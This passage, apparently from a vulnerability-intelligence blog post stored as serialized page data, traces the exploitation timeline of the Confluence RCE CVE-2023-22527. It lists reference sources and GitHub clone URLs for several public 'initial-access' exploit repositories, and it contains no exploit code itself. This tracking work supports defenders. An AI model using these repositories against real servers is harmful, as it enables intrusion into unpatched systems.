We can explore the JSON data from VulnCheck KEV using the following URL: ",[47,76726,69377],{"href":69377,"rel":76727},[51],[18,76729,76730],{},"Reviewing the JSON, we observe the following timeline for the CVE:",[22,76732,76733,76736,76739],{},[25,76734,76735],{},"01-21-2024: Date of first observation by a public source",[25,76737,76738],{},"01-24-2024: Date added to CISA KEV",[25,76740,76741],{},"02-14-2024: Date by which CISA requires federal agencies to remediate the vulnerability",[18,76743,76744],{},"Example JSON from VulnCheck KEV:",[1354,76746,76748],{"className":22307,"code":76747,"language":22309,"meta":219,"style":219},"      \"dueDate\": \"2024-02-14T00:00:00Z\",\n      \"cisa_date_added\": \"2024-01-24T00:00:00Z\",\n      \"date_added\": \"2024-01-21T00:00:00Z\",\n      \"_timestamp\": \"2024-02-26T09:25:46.098273Z\"\n",[886,76749,76750,76770,76789,76808],{"__ignoreMap":219},[1373,76751,76752,76754,76757,76759,76761,76763,76766,76768],{"class":1375,"line":1376},[1373,76753,26357],{"class":1387},[1373,76755,76756],{"class":1391},"dueDate",[1373,76758,183],{"class":1387},[1373,76760,20051],{"class":4640},[1373,76762,183],{"class":1387},[1373,76764,76765],{"class":1391},"2024-02-14T00:00:00Z",[1373,76767,183],{"class":1387},[1373,76769,9062],{"class":4640},[1373,76771,76772,76774,76776,76778,76780,76782,76785,76787],{"class":1375,"line":220},[1373,76773,26357],{"class":1387},[1373,76775,13001],{"class":1391},[1373,76777,183],{"class":1387},[1373,76779,20051],{"class":4640},[1373,76781,183],{"class":1387},[1373,76783,76784],{"class":1391},"2024-01-24T00:00:00Z",[1373,76786,183],{"class":1387},[1373,76788,9062],{"class":4640},[1373,76790,76791,76793,76795,76797,76799,76801,76804,76806],{"class":1375,"line":1266},[1373,76792,26357],{"class":1387},[1373,76794,12998],{"class":1391},[1373,76796,183],{"class":1387},[1373,76798,20051],{"class":4640},[1373,76800,183],{"class":1387},[1373,76802,76803],{"class":1391},"2024-01-21T00:00:00Z",[1373,76805,183],{"class":1
387},[1373,76807,9062],{"class":4640},[1373,76809,76810,76812,76814,76816,76818,76820,76823],{"class":1375,"line":1852},[1373,76811,26357],{"class":1387},[1373,76813,26501],{"class":1391},[1373,76815,183],{"class":1387},[1373,76817,20051],{"class":4640},[1373,76819,183],{"class":1387},[1373,76821,76822],{"class":1391},"2024-02-26T09:25:46.098273Z",[1373,76824,19057],{"class":1387},[61,76826,76828],{"id":76827},"exploring-references-for-known-exploitation","Exploring References for Known Exploitation",[18,76830,76831],{},"Now, with a high-level overview of the timeline of publicly known exploitation, let's examine the referenceable sources provided in VulnCheck KEV. For this CVE, there are nine available reference sources to date, including:",[22,76833,76834,76837,76840,76843,76846,76849,76852],{},[25,76835,76836],{},"01-21-2024 (First Seen): @TheDFIRReport",[25,76838,76839],{},"01-22-2024: ShadowServer",[25,76841,76842],{},"01-22-2024: SANS Internet Storm Center",[25,76844,76845],{},"01-23-2024: @catc0n",[25,76847,76848],{},"01-23-2024: Tenable Blog",[25,76850,76851],{},"02-01-2024: FortiGuard Threat Signal Report",[25,76853,76854],{},"02-21-2024: Imperva Blog",[18,76856,76857],{},"Example JSON of reported exploitation:",[1354,76859,76861],{"className":22307,"code":76860,"language":22309,"meta":219,"style":219},"\"vulncheck_reported_exploitation\": [\n        {\n          \"url\": \"https:\u002F\u002Fwww.cisa.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Ffeeds\u002Fknown_exploited_vulnerabilities.json\",\n          \"date_added\": \"2024-01-24T00:00:00Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fmap\u002F?day=2024-01-22&host_type=src&vulnerability=cve-2023-22527\",\n          \"date_added\": \"2024-01-22T00:00:00Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Ftwitter.com\u002FTheDFIRReport\u002Fstatus\u002F1749066611678466205\",\n          \"date_added\": 
\"2024-01-21T00:00:00Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fisc.sans.edu\u002Fdiary\u002Frss\u002F30576\",\n          \"date_added\": \"2024-01-22T00:00:00Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Ftwitter.com\u002FTheDFIRReport\u002Fstatus\u002F1749424404063232099?s=20\",\n          \"date_added\": \"2024-01-22T00:00:00Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Ftwitter.com\u002Fcatc0n\u002Fstatus\u002F1749912359127105813?s=20\",\n          \"date_added\": \"2024-01-23T00:00:00Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fwww.tenable.com\u002Fblog\u002Fcve-2023-22527-atlassian-confluence-data-center-and-server-template-injection-exploited-in-the\",\n          \"date_added\": \"2024-01-23T00:00:00Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fwww.fortiguard.com\u002Fthreat-signal-report\u002F5376\u002Fatlassian-confluence-remote-code-execution-cve-2023-22527\",\n          \"date_added\": \"2024-02-01T00:00:00Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fwww.imperva.com\u002Fblog\u002Fattackers-quick-to-weaponize-cve-2023-22527-for-malware-delivery\u002F\",\n          \"date_added\": \"2024-02-21T00:00:00Z\"\n        }\n      
]\n",[886,76862,76863,76875,76879,76898,76914,76918,76922,76941,76958,76962,76966,76985,77001,77005,77009,77027,77043,77047,77051,77070,77086,77090,77094,77113,77130,77134,77138,77157,77173,77177,77181,77200,77217,77221,77225,77243,77260,77264],{"__ignoreMap":219},[1373,76864,76865,76867,76869,76871,76873],{"class":1375,"line":1376},[1373,76866,183],{"class":1387},[1373,76868,28860],{"class":1391},[1373,76870,183],{"class":1387},[1373,76872,20051],{"class":4640},[1373,76874,9050],{"class":1383},[1373,76876,76877],{"class":1375,"line":220},[1373,76878,9788],{"class":1383},[1373,76880,76881,76883,76885,76887,76889,76891,76894,76896],{"class":1375,"line":1266},[1373,76882,28875],{"class":9152},[1373,76884,7585],{"class":9155},[1373,76886,183],{"class":9152},[1373,76888,4606],{"class":1383},[1373,76890,4883],{"class":9173},[1373,76892,76893],{"class":9176},"https:\u002F\u002Fwww.cisa.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Ffeeds\u002Fknown_exploited_vulnerabilities.json",[1373,76895,183],{"class":9173},[1373,76897,9062],{"class":1383},[1373,76899,76900,76902,76904,76906,76908,76910,76912],{"class":1375,"line":1852},[1373,76901,28875],{"class":9152},[1373,76903,12998],{"class":9155},[1373,76905,183],{"class":9152},[1373,76907,4606],{"class":1383},[1373,76909,4883],{"class":9173},[1373,76911,76784],{"class":9176},[1373,76913,19057],{"class":9173},[1373,76915,76916],{"class":1375,"line":4692},[1373,76917,28912],{"class":1383},[1373,76919,76920],{"class":1375,"line":4724},[1373,76921,9788],{"class":1383},[1373,76923,76924,76926,76928,76930,76932,76934,76937,76939],{"class":1375,"line":4756},[1373,76925,28875],{"class":9152},[1373,76927,7585],{"class":9155},[1373,76929,183],{"class":9152},[1373,76931,4606],{"class":1383},[1373,76933,4883],{"class":9173},[1373,76935,76936],{"class":9176},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fmap\u002F?day=2024-01-22&host_type=src&vulnerability=cve-2023-22527",[1373,76938,183],{"class":9173},[1373
,76940,9062],{"class":1383},[1373,76942,76943,76945,76947,76949,76951,76953,76956],{"class":1375,"line":4768},[1373,76944,28875],{"class":9152},[1373,76946,12998],{"class":9155},[1373,76948,183],{"class":9152},[1373,76950,4606],{"class":1383},[1373,76952,4883],{"class":9173},[1373,76954,76955],{"class":9176},"2024-01-22T00:00:00Z",[1373,76957,19057],{"class":9173},[1373,76959,76960],{"class":1375,"line":4792},[1373,76961,28912],{"class":1383},[1373,76963,76964],{"class":1375,"line":4798},[1373,76965,9788],{"class":1383},[1373,76967,76968,76970,76972,76974,76976,76978,76981,76983],{"class":1375,"line":4806},[1373,76969,28875],{"class":9152},[1373,76971,7585],{"class":9155},[1373,76973,183],{"class":9152},[1373,76975,4606],{"class":1383},[1373,76977,4883],{"class":9173},[1373,76979,76980],{"class":9176},"https:\u002F\u002Ftwitter.com\u002FTheDFIRReport\u002Fstatus\u002F1749066611678466205",[1373,76982,183],{"class":9173},[1373,76984,9062],{"class":1383},[1373,76986,76987,76989,76991,76993,76995,76997,76999],{"class":1375,"line":4817},[1373,76988,28875],{"class":9152},[1373,76990,12998],{"class":9155},[1373,76992,183],{"class":9152},[1373,76994,4606],{"class":1383},[1373,76996,4883],{"class":9173},[1373,76998,76803],{"class":9176},[1373,77000,19057],{"class":9173},[1373,77002,77003],{"class":1375,"line":4825},[1373,77004,28912],{"class":1383},[1373,77006,77007],{"class":1375,"line":4835},[1373,77008,9788],{"class":1383},[1373,77010,77011,77013,77015,77017,77019,77021,77023,77025],{"class":1375,"line":4843},[1373,77012,28875],{"class":9152},[1373,77014,7585],{"class":9155},[1373,77016,183],{"class":9152},[1373,77018,4606],{"class":1383},[1373,77020,4883],{"class":9173},[1373,77022,74194],{"class":9176},[1373,77024,183],{"class":9173},[1373,77026,9062],{"class":1383},[1373,77028,77029,77031,77033,77035,77037,77039,77041],{"class":1375,"line":4849},[1373,77030,28875],{"class":9152},[1373,77032,12998],{"class":9155},[1373,77034,183],{"class":9152},[1373,77036,4606],{"class
":1383},[1373,77038,4883],{"class":9173},[1373,77040,76955],{"class":9176},[1373,77042,19057],{"class":9173},[1373,77044,77045],{"class":1375,"line":4877},[1373,77046,28912],{"class":1383},[1373,77048,77049],{"class":1375,"line":4915},[1373,77050,9788],{"class":1383},[1373,77052,77053,77055,77057,77059,77061,77063,77066,77068],{"class":1375,"line":4931},[1373,77054,28875],{"class":9152},[1373,77056,7585],{"class":9155},[1373,77058,183],{"class":9152},[1373,77060,4606],{"class":1383},[1373,77062,4883],{"class":9173},[1373,77064,77065],{"class":9176},"https:\u002F\u002Ftwitter.com\u002FTheDFIRReport\u002Fstatus\u002F1749424404063232099?s=20",[1373,77067,183],{"class":9173},[1373,77069,9062],{"class":1383},[1373,77071,77072,77074,77076,77078,77080,77082,77084],{"class":1375,"line":4947},[1373,77073,28875],{"class":9152},[1373,77075,12998],{"class":9155},[1373,77077,183],{"class":9152},[1373,77079,4606],{"class":1383},[1373,77081,4883],{"class":9173},[1373,77083,76955],{"class":9176},[1373,77085,19057],{"class":9173},[1373,77087,77088],{"class":1375,"line":4952},[1373,77089,28912],{"class":1383},[1373,77091,77092],{"class":1375,"line":6776},[1373,77093,9788],{"class":1383},[1373,77095,77096,77098,77100,77102,77104,77106,77109,77111],{"class":1375,"line":6781},[1373,77097,28875],{"class":9152},[1373,77099,7585],{"class":9155},[1373,77101,183],{"class":9152},[1373,77103,4606],{"class":1383},[1373,77105,4883],{"class":9173},[1373,77107,77108],{"class":9176},"https:\u002F\u002Ftwitter.com\u002Fcatc0n\u002Fstatus\u002F1749912359127105813?s=20",[1373,77110,183],{"class":9173},[1373,77112,9062],{"class":1383},[1373,77114,77115,77117,77119,77121,77123,77125,77128],{"class":1375,"line":7524},[1373,77116,28875],{"class":9152},[1373,77118,12998],{"class":9155},[1373,77120,183],{"class":9152},[1373,77122,4606],{"class":1383},[1373,77124,4883],{"class":9173},[1373,77126,77127],{"class":9176},"2024-01-23T00:00:00Z",[1373,77129,19057],{"class":9173},[1373,77131,77132],{"class":1375,"l
ine":7530},[1373,77133,28912],{"class":1383},[1373,77135,77136],{"class":1375,"line":7546},[1373,77137,9788],{"class":1383},[1373,77139,77140,77142,77144,77146,77148,77150,77153,77155],{"class":1375,"line":7571},[1373,77141,28875],{"class":9152},[1373,77143,7585],{"class":9155},[1373,77145,183],{"class":9152},[1373,77147,4606],{"class":1383},[1373,77149,4883],{"class":9173},[1373,77151,77152],{"class":9176},"https:\u002F\u002Fwww.tenable.com\u002Fblog\u002Fcve-2023-22527-atlassian-confluence-data-center-and-server-template-injection-exploited-in-the",[1373,77154,183],{"class":9173},[1373,77156,9062],{"class":1383},[1373,77158,77159,77161,77163,77165,77167,77169,77171],{"class":1375,"line":7598},[1373,77160,28875],{"class":9152},[1373,77162,12998],{"class":9155},[1373,77164,183],{"class":9152},[1373,77166,4606],{"class":1383},[1373,77168,4883],{"class":9173},[1373,77170,77127],{"class":9176},[1373,77172,19057],{"class":9173},[1373,77174,77175],{"class":1375,"line":7615},[1373,77176,28912],{"class":1383},[1373,77178,77179],{"class":1375,"line":7635},[1373,77180,9788],{"class":1383},[1373,77182,77183,77185,77187,77189,77191,77193,77196,77198],{"class":1375,"line":7640},[1373,77184,28875],{"class":9152},[1373,77186,7585],{"class":9155},[1373,77188,183],{"class":9152},[1373,77190,4606],{"class":1383},[1373,77192,4883],{"class":9173},[1373,77194,77195],{"class":9176},"https:\u002F\u002Fwww.fortiguard.com\u002Fthreat-signal-report\u002F5376\u002Fatlassian-confluence-remote-code-execution-cve-2023-22527",[1373,77197,183],{"class":9173},[1373,77199,9062],{"class":1383},[1373,77201,77202,77204,77206,77208,77210,77212,77215],{"class":1375,"line":7648},[1373,77203,28875],{"class":9152},[1373,77205,12998],{"class":9155},[1373,77207,183],{"class":9152},[1373,77209,4606],{"class":1383},[1373,77211,4883],{"class":9173},[1373,77213,77214],{"class":9176},"2024-02-01T00:00:00Z",[1373,77216,19057],{"class":9173},[1373,77218,77219],{"class":1375,"line":7672},[1373,77220,28912],{"class":
1383},[1373,77222,77223],{"class":1375,"line":7688},[1373,77224,9788],{"class":1383},[1373,77226,77227,77229,77231,77233,77235,77237,77239,77241],{"class":1375,"line":7709},[1373,77228,28875],{"class":9152},[1373,77230,7585],{"class":9155},[1373,77232,183],{"class":9152},[1373,77234,4606],{"class":1383},[1373,77236,4883],{"class":9173},[1373,77238,74150],{"class":9176},[1373,77240,183],{"class":9173},[1373,77242,9062],{"class":1383},[1373,77244,77245,77247,77249,77251,77253,77255,77258],{"class":1375,"line":7714},[1373,77246,28875],{"class":9152},[1373,77248,12998],{"class":9155},[1373,77250,183],{"class":9152},[1373,77252,4606],{"class":1383},[1373,77254,4883],{"class":9173},[1373,77256,77257],{"class":9176},"2024-02-21T00:00:00Z",[1373,77259,19057],{"class":9173},[1373,77261,77262],{"class":1375,"line":7722},[1373,77263,9861],{"class":1383},[1373,77265,77266],{"class":1375,"line":9903},[1373,77267,77268],{"class":1383},"      ]\n",[61,77270,77272],{"id":77271},"expanding-the-view-into-publicly-available-exploits","Expanding the View Into Publicly Available Exploits",[18,77274,77275],{},"Notably, the first publicly available exploit on GitHub was accessible on 01-17-2024, before the vulnerability was published to VulnCheck KEV (available in our commercial exploit feeds). 
After the first known exploitation was seen on 01-21-2024, there have been ten additional exploits posted on GitHub: three on 01-22-2024, three on 01-23-2024, three on 01-24-2024, and one on 02-02-2024.",[18,77277,77278],{},"Example JSON of Publicly Available Exploits:",[1354,77280,77282],{"className":22307,"code":77281,"language":22309,"meta":219,"style":219},"      \"vulncheck_xdb\": [\n        {\n          \"xdb_id\": \"b86f8af644dc\",\n          \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb86f8af644dc\",\n          \"date_added\": \"2024-01-23T09:28:53Z\",\n          \"exploit_type\": \"initial-access\",\n          \"clone_ssh_url\": \"git@github.com:Niuwoo\u002FCVE-2023-22527.git\"\n        },\n        {\n          \"xdb_id\": \"b6e41e9efa89\",\n          \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb6e41e9efa89\",\n          \"date_added\": \"2024-01-24T21:29:59Z\",\n          \"exploit_type\": \"initial-access\",\n          \"clone_ssh_url\": \"git@github.com:Privia-Security\u002FCVE-2023-22527.git\"\n        },\n        {\n          \"xdb_id\": \"66eb62ffb562\",\n          \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F66eb62ffb562\",\n          \"date_added\": \"2024-01-22T11:38:55Z\",\n          \"exploit_type\": \"initial-access\",\n          \"clone_ssh_url\": \"git@github.com:Drun1baby\u002FCVE-2023-22527.git\"\n        },\n        {\n          \"xdb_id\": \"2054e543b959\",\n          \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F2054e543b959\",\n          \"date_added\": \"2024-01-22T13:26:45Z\",\n          \"exploit_type\": \"initial-access\",\n          \"clone_ssh_url\": \"git@github.com:cleverg0d\u002FCVE-2023-22527.git\"\n        },\n        {\n          \"xdb_id\": \"242d461849bd\",\n          \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F242d461849bd\",\n          \"date_added\": \"2024-01-17T10:21:00Z\",\n          \"exploit_type\": \"initial-access\",\n          
\"clone_ssh_url\": \"git@github.com:ga0we1\u002FCVE-2023-22527_Confluence_RCE.git\"\n        },\n        {\n          \"xdb_id\": \"4530fd2e7aec\",\n          \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F4530fd2e7aec\",\n          \"date_added\": \"2024-01-24T04:44:59Z\",\n          \"exploit_type\": \"initial-access\",\n          \"clone_ssh_url\": \"git@github.com:yoryio\u002FCVE-2023-22527.git\"\n        },\n        {\n          \"xdb_id\": \"d6ff5abefc7e\",\n          \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fd6ff5abefc7e\",\n          \"date_added\": \"2024-01-22T19:02:59Z\",\n          \"exploit_type\": \"initial-access\",\n          \"clone_ssh_url\": \"git@github.com:thanhlam-attt\u002FCVE-2023-22527.git\"\n        },\n        {\n          \"xdb_id\": \"30d9851d825e\",\n          \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F30d9851d825e\",\n          \"date_added\": \"2024-01-23T10:55:28Z\",\n          \"exploit_type\": \"initial-access\",\n          \"clone_ssh_url\": \"git@github.com:Chocapikk\u002FCVE-2023-22527.git\"\n        },\n        {\n          \"xdb_id\": \"4875746a557f\",\n          \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F4875746a557f\",\n          \"date_added\": \"2024-02-02T04:20:14Z\",\n          \"exploit_type\": \"initial-access\",\n          \"clone_ssh_url\": \"git@github.com:YongYe-Security\u002FCVE-2023-22527.git\"\n        },\n        {\n          \"xdb_id\": \"a3677d9bae7f\",\n          \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fa3677d9bae7f\",\n          \"date_added\": \"2024-01-23T07:10:55Z\",\n          \"exploit_type\": \"initial-access\",\n          \"clone_ssh_url\": \"git@github.com:VNCERT-CC\u002FCVE-2023-22527-confluence.git\"\n        }\n      
]\n",[886,77283,77284,77296,77300,77319,77338,77357,77375,77392,77396,77400,77419,77438,77457,77475,77492,77496,77500,77519,77538,77557,77575,77592,77596,77600,77619,77638,77657,77675,77692,77696,77700,77719,77738,77757,77775,77792,77796,77800,77819,77838,77857,77875,77892,77896,77900,77919,77938,77957,77975,77992,77996,78000,78019,78038,78057,78075,78092,78096,78100,78119,78138,78157,78175,78192,78196,78200,78219,78238,78257,78275,78292,78296],{"__ignoreMap":219},[1373,77285,77286,77288,77290,77292,77294],{"class":1375,"line":1376},[1373,77287,26357],{"class":1387},[1373,77289,22318],{"class":1391},[1373,77291,183],{"class":1387},[1373,77293,20051],{"class":4640},[1373,77295,9050],{"class":1383},[1373,77297,77298],{"class":1375,"line":220},[1373,77299,9788],{"class":1383},[1373,77301,77302,77304,77306,77308,77310,77312,77315,77317],{"class":1375,"line":1266},[1373,77303,28875],{"class":9152},[1373,77305,22335],{"class":9155},[1373,77307,183],{"class":9152},[1373,77309,4606],{"class":1383},[1373,77311,4883],{"class":9173},[1373,77313,77314],{"class":9176},"b86f8af644dc",[1373,77316,183],{"class":9173},[1373,77318,9062],{"class":1383},[1373,77320,77321,77323,77325,77327,77329,77331,77334,77336],{"class":1375,"line":1852},[1373,77322,28875],{"class":9152},[1373,77324,22355],{"class":9155},[1373,77326,183],{"class":9152},[1373,77328,4606],{"class":1383},[1373,77330,4883],{"class":9173},[1373,77332,77333],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb86f8af644dc",[1373,77335,183],{"class":9173},[1373,77337,9062],{"class":1383},[1373,77339,77340,77342,77344,77346,77348,77350,77353,77355],{"class":1375,"line":4692},[1373,77341,28875],{"class":9152},[1373,77343,12998],{"class":9155},[1373,77345,183],{"class":9152},[1373,77347,4606],{"class":1383},[1373,77349,4883],{"class":9173},[1373,77351,77352],{"class":9176},"2024-01-23T09:28:53Z",[1373,77354,183],{"class":9173},[1373,77356,9062],{"class":1383},[1373,77358,77359,77361,77363,77365,77367,77369,77371,7737
3],{"class":1375,"line":4724},[1373,77360,28875],{"class":9152},[1373,77362,22394],{"class":9155},[1373,77364,183],{"class":9152},[1373,77366,4606],{"class":1383},[1373,77368,4883],{"class":9173},[1373,77370,1281],{"class":9176},[1373,77372,183],{"class":9173},[1373,77374,9062],{"class":1383},[1373,77376,77377,77379,77381,77383,77385,77387,77390],{"class":1375,"line":4756},[1373,77378,28875],{"class":9152},[1373,77380,22413],{"class":9155},[1373,77382,183],{"class":9152},[1373,77384,4606],{"class":1383},[1373,77386,4883],{"class":9173},[1373,77388,77389],{"class":9176},"git@github.com:Niuwoo\u002FCVE-2023-22527.git",[1373,77391,19057],{"class":9173},[1373,77393,77394],{"class":1375,"line":4768},[1373,77395,28912],{"class":1383},[1373,77397,77398],{"class":1375,"line":4792},[1373,77399,9788],{"class":1383},[1373,77401,77402,77404,77406,77408,77410,77412,77415,77417],{"class":1375,"line":4798},[1373,77403,28875],{"class":9152},[1373,77405,22335],{"class":9155},[1373,77407,183],{"class":9152},[1373,77409,4606],{"class":1383},[1373,77411,4883],{"class":9173},[1373,77413,77414],{"class":9176},"b6e41e9efa89",[1373,77416,183],{"class":9173},[1373,77418,9062],{"class":1383},[1373,77420,77421,77423,77425,77427,77429,77431,77434,77436],{"class":1375,"line":4806},[1373,77422,28875],{"class":9152},[1373,77424,22355],{"class":9155},[1373,77426,183],{"class":9152},[1373,77428,4606],{"class":1383},[1373,77430,4883],{"class":9173},[1373,77432,77433],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb6e41e9efa89",[1373,77435,183],{"class":9173},[1373,77437,9062],{"class":1383},[1373,77439,77440,77442,77444,77446,77448,77450,77453,77455],{"class":1375,"line":4817},[1373,77441,28875],{"class":9152},[1373,77443,12998],{"class":9155},[1373,77445,183],{"class":9152},[1373,77447,4606],{"class":1383},[1373,77449,4883],{"class":9173},[1373,77451,77452],{"class":9176},"2024-01-24T21:29:59Z",[1373,77454,183],{"class":9173},[1373,77456,9062],{"class":1383},[1373,77458,77459,77461,7
7463,77465,77467,77469,77471,77473],{"class":1375,"line":4825},[1373,77460,28875],{"class":9152},[1373,77462,22394],{"class":9155},[1373,77464,183],{"class":9152},[1373,77466,4606],{"class":1383},[1373,77468,4883],{"class":9173},[1373,77470,1281],{"class":9176},[1373,77472,183],{"class":9173},[1373,77474,9062],{"class":1383},[1373,77476,77477,77479,77481,77483,77485,77487,77490],{"class":1375,"line":4835},[1373,77478,28875],{"class":9152},[1373,77480,22413],{"class":9155},[1373,77482,183],{"class":9152},[1373,77484,4606],{"class":1383},[1373,77486,4883],{"class":9173},[1373,77488,77489],{"class":9176},"git@github.com:Privia-Security\u002FCVE-2023-22527.git",[1373,77491,19057],{"class":9173},[1373,77493,77494],{"class":1375,"line":4843},[1373,77495,28912],{"class":1383},[1373,77497,77498],{"class":1375,"line":4849},[1373,77499,9788],{"class":1383},[1373,77501,77502,77504,77506,77508,77510,77512,77515,77517],{"class":1375,"line":4877},[1373,77503,28875],{"class":9152},[1373,77505,22335],{"class":9155},[1373,77507,183],{"class":9152},[1373,77509,4606],{"class":1383},[1373,77511,4883],{"class":9173},[1373,77513,77514],{"class":9176},"66eb62ffb562",[1373,77516,183],{"class":9173},[1373,77518,9062],{"class":1383},[1373,77520,77521,77523,77525,77527,77529,77531,77534,77536],{"class":1375,"line":4915},[1373,77522,28875],{"class":9152},[1373,77524,22355],{"class":9155},[1373,77526,183],{"class":9152},[1373,77528,4606],{"class":1383},[1373,77530,4883],{"class":9173},[1373,77532,77533],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F66eb62ffb562",[1373,77535,183],{"class":9173},[1373,77537,9062],{"class":1383},[1373,77539,77540,77542,77544,77546,77548,77550,77553,77555],{"class":1375,"line":4931},[1373,77541,28875],{"class":9152},[1373,77543,12998],{"class":9155},[1373,77545,183],{"class":9152},[1373,77547,4606],{"class":1383},[1373,77549,4883],{"class":9173},[1373,77551,77552],{"class":9176},"2024-01-22T11:38:55Z",[1373,77554,183],{"class":9173},[1373,77556,9062
],{"class":1383},[1373,77558,77559,77561,77563,77565,77567,77569,77571,77573],{"class":1375,"line":4947},[1373,77560,28875],{"class":9152},[1373,77562,22394],{"class":9155},[1373,77564,183],{"class":9152},[1373,77566,4606],{"class":1383},[1373,77568,4883],{"class":9173},[1373,77570,1281],{"class":9176},[1373,77572,183],{"class":9173},[1373,77574,9062],{"class":1383},[1373,77576,77577,77579,77581,77583,77585,77587,77590],{"class":1375,"line":4952},[1373,77578,28875],{"class":9152},[1373,77580,22413],{"class":9155},[1373,77582,183],{"class":9152},[1373,77584,4606],{"class":1383},[1373,77586,4883],{"class":9173},[1373,77588,77589],{"class":9176},"git@github.com:Drun1baby\u002FCVE-2023-22527.git",[1373,77591,19057],{"class":9173},[1373,77593,77594],{"class":1375,"line":6776},[1373,77595,28912],{"class":1383},[1373,77597,77598],{"class":1375,"line":6781},[1373,77599,9788],{"class":1383},[1373,77601,77602,77604,77606,77608,77610,77612,77615,77617],{"class":1375,"line":7524},[1373,77603,28875],{"class":9152},[1373,77605,22335],{"class":9155},[1373,77607,183],{"class":9152},[1373,77609,4606],{"class":1383},[1373,77611,4883],{"class":9173},[1373,77613,77614],{"class":9176},"2054e543b959",[1373,77616,183],{"class":9173},[1373,77618,9062],{"class":1383},[1373,77620,77621,77623,77625,77627,77629,77631,77634,77636],{"class":1375,"line":7530},[1373,77622,28875],{"class":9152},[1373,77624,22355],{"class":9155},[1373,77626,183],{"class":9152},[1373,77628,4606],{"class":1383},[1373,77630,4883],{"class":9173},[1373,77632,77633],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F2054e543b959",[1373,77635,183],{"class":9173},[1373,77637,9062],{"class":1383},[1373,77639,77640,77642,77644,77646,77648,77650,77653,77655],{"class":1375,"line":7546},[1373,77641,28875],{"class":9152},[1373,77643,12998],{"class":9155},[1373,77645,183],{"class":9152},[1373,77647,4606],{"class":1383},[1373,77649,4883],{"class":9173},[1373,77651,77652],{"class":9176},"2024-01-22T13:26:45Z",[1373,77654,
183],{"class":9173},[1373,77656,9062],{"class":1383},[1373,77658,77659,77661,77663,77665,77667,77669,77671,77673],{"class":1375,"line":7571},[1373,77660,28875],{"class":9152},[1373,77662,22394],{"class":9155},[1373,77664,183],{"class":9152},[1373,77666,4606],{"class":1383},[1373,77668,4883],{"class":9173},[1373,77670,1281],{"class":9176},[1373,77672,183],{"class":9173},[1373,77674,9062],{"class":1383},[1373,77676,77677,77679,77681,77683,77685,77687,77690],{"class":1375,"line":7598},[1373,77678,28875],{"class":9152},[1373,77680,22413],{"class":9155},[1373,77682,183],{"class":9152},[1373,77684,4606],{"class":1383},[1373,77686,4883],{"class":9173},[1373,77688,77689],{"class":9176},"git@github.com:cleverg0d\u002FCVE-2023-22527.git",[1373,77691,19057],{"class":9173},[1373,77693,77694],{"class":1375,"line":7615},[1373,77695,28912],{"class":1383},[1373,77697,77698],{"class":1375,"line":7635},[1373,77699,9788],{"class":1383},[1373,77701,77702,77704,77706,77708,77710,77712,77715,77717],{"class":1375,"line":7640},[1373,77703,28875],{"class":9152},[1373,77705,22335],{"class":9155},[1373,77707,183],{"class":9152},[1373,77709,4606],{"class":1383},[1373,77711,4883],{"class":9173},[1373,77713,77714],{"class":9176},"242d461849bd",[1373,77716,183],{"class":9173},[1373,77718,9062],{"class":1383},[1373,77720,77721,77723,77725,77727,77729,77731,77734,77736],{"class":1375,"line":7648},[1373,77722,28875],{"class":9152},[1373,77724,22355],{"class":9155},[1373,77726,183],{"class":9152},[1373,77728,4606],{"class":1383},[1373,77730,4883],{"class":9173},[1373,77732,77733],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F242d461849bd",[1373,77735,183],{"class":9173},[1373,77737,9062],{"class":1383},[1373,77739,77740,77742,77744,77746,77748,77750,77753,77755],{"class":1375,"line":7672},[1373,77741,28875],{"class":9152},[1373,77743,12998],{"class":9155},[1373,77745,183],{"class":9152},[1373,77747,4606],{"class":1383},[1373,77749,4883],{"class":9173},[1373,77751,77752],{"class":9176}
,"2024-01-17T10:21:00Z",[1373,77754,183],{"class":9173},[1373,77756,9062],{"class":1383},[1373,77758,77759,77761,77763,77765,77767,77769,77771,77773],{"class":1375,"line":7688},[1373,77760,28875],{"class":9152},[1373,77762,22394],{"class":9155},[1373,77764,183],{"class":9152},[1373,77766,4606],{"class":1383},[1373,77768,4883],{"class":9173},[1373,77770,1281],{"class":9176},[1373,77772,183],{"class":9173},[1373,77774,9062],{"class":1383},[1373,77776,77777,77779,77781,77783,77785,77787,77790],{"class":1375,"line":7709},[1373,77778,28875],{"class":9152},[1373,77780,22413],{"class":9155},[1373,77782,183],{"class":9152},[1373,77784,4606],{"class":1383},[1373,77786,4883],{"class":9173},[1373,77788,77789],{"class":9176},"git@github.com:ga0we1\u002FCVE-2023-22527_Confluence_RCE.git",[1373,77791,19057],{"class":9173},[1373,77793,77794],{"class":1375,"line":7714},[1373,77795,28912],{"class":1383},[1373,77797,77798],{"class":1375,"line":7722},[1373,77799,9788],{"class":1383},[1373,77801,77802,77804,77806,77808,77810,77812,77815,77